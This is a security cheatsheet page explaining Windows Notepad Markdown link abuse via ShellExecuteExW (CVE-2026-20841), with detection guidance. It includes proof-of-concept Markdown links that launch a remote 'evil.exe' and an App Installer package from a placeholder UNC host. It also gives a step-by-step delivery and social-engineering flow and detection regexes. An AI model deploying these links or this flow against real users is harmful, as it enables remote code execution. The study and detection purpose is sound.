daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

protocol-handler-shell-execute-abuse.md (3932B)


      1 ---
      2 title: "Windows Protocol Handler / ShellExecute Abuse (Markdown Renderers)"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/protocol-handler-shell-execute-abuse.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/protocol-handler-shell-execute-abuse.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Windows Protocol Handler / ShellExecute Abuse (Markdown Renderers)
     14 
     15 Windows applications that render Markdown or HTML may hand clicked targets to `ShellExecuteExW`. Because ShellExecute dispatches registered URI schemes and file associations, a renderer needs an explicit allowlist rather than assuming every link is HTTP(S). The Notepad behavior below describes CVE-2026-20841 and should not be generalized to every renderer.<sup>[[1]](#references)[[3]](#references)</sup>
     16 
     17 ## ShellExecuteExW surface in Windows Notepad Markdown mode
     18 - Notepad chooses Markdown mode **only for `.md` extensions** via a fixed string comparison in `sub_1400ED5D0()`.<sup>[[1]](#references)</sup>
     19 - Supported Markdown links:
     20   - Standard: `[text](target)`
     21   - Autolink: `<target>` (rendered as `[target](target)`), so both syntaxes matter for payloads and detections.
     22 - Link clicks are processed in `sub_140170F60()`, which performs weak filtering and then calls `ShellExecuteExW`.
     23 - `ShellExecuteExW` dispatches to **any configured protocol handler**, not just HTTP(S).<sup>[[1]](#references)</sup>
     24 
     25 ### Payload considerations
     26 - Any `\\` sequences in the link are **normalized to `\`** before `ShellExecuteExW`, impacting UNC/path crafting and detection.
     27 - `.md` files are **not associated with Notepad by default**; the victim must still open the file in Notepad and click the link, but once rendered, the link is clickable.
     28 - Dangerous example schemes:<sup>[[1]](#references)</sup>
     29   - `file://` to launch a local/UNC payload.
     30   - `ms-appinstaller://` to trigger App Installer flows. Other locally registered schemes may also be abusable.
     31 
     32 ### Minimal PoC Markdown
     33 ```markdown
     34 [run](file://\\192.0.2.10\\share\\evil.exe)
     35 <ms-appinstaller://\\192.0.2.10\\share\\pkg.appinstaller>
     36 ```
     37 
     38 ### Exploitation flow
     39 1. Craft a **`.md` file** so Notepad renders it as Markdown.
     40 2. Embed a link using a dangerous URI scheme (`file:`, `ms-appinstaller:`, or any installed handler).
     41 3. Deliver the file (HTTP/HTTPS/FTP/IMAP/NFS/POP3/SMTP/SMB or similar) and convince the user to open it in Notepad.
     42 4. On click, the **normalized link** is handed to `ShellExecuteExW` and the corresponding protocol handler executes the referenced content in the user’s context.<sup>[[1]](#references)[[2]](#references)</sup>
     43 
     44 ## Detection ideas
     45 - Monitor transfers of `.md` files over ports/protocols that commonly deliver documents: `20/21 (FTP)`, `80 (HTTP)`, `443 (HTTPS)`, `110 (POP3)`, `143 (IMAP)`, `25/587 (SMTP)`, `139/445 (SMB/CIFS)`, `2049 (NFS)`, `111 (portmap)`.
     46 - Parse Markdown links (standard and autolink) and look for **case-insensitive** `file:` or `ms-appinstaller:`.
     47 - Vendor-guided regexes to catch remote resource access:
     48 ```text
     49 (\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}
     50 (\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}
     51 ```
     52 - The vendor fix described by ZDI restricts accepted targets to local files and HTTP(S). Extend detections to other installed protocol handlers as needed because the registered attack surface varies by system.<sup>[[1]](#references)</sup>
     53 
     54 ## References
     55 - [1] [CVE-2026-20841: Arbitrary Code Execution in the Windows Notepad](https://www.thezdi.com/blog/2026/2/19/cve-2026-20841-arbitrary-code-execution-in-the-windows-notepad)
     56 - [2] [CVE-2026-20841 PoC](https://github.com/BTtea/CVE-2026-20841-PoC)
     57 - [3] [Microsoft Learn — `ShellExecuteExW`](https://learn.microsoft.com/en-us/windows/win32/api/shellapi/nf-shellapi-shellexecuteexw)